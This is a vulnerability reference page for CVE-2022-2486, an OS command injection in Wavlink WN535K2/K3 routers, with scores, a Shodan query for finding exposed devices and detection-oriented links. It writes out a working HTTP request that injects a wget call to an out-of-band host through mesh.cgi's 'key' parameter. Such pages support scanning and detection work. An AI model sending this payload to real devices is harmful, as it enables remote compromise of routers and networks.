🔙 목록으로 돌아가기

CVE-2022-2486: Wavlink WN535K2/WN535K3 - OS Command Injection

TitleWavlink WN535K2/WN535K3 - OS Command Injection
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
RemediationApply the latest firmware update provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.92744
CVE IDCVE-2022-2486
CWE IDCWE-78
Shodan Queryhttp.title:"Wi-Fi APP Login"
Tags cve2022 cve iot wavlink router rce oast vkev vuln

🔍 Vulnerability Description

Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

🌐 HTTP Request

GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d5jm7lhle0o4o60an390up9donndgddo9.oast.fun;%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2486.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2486.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A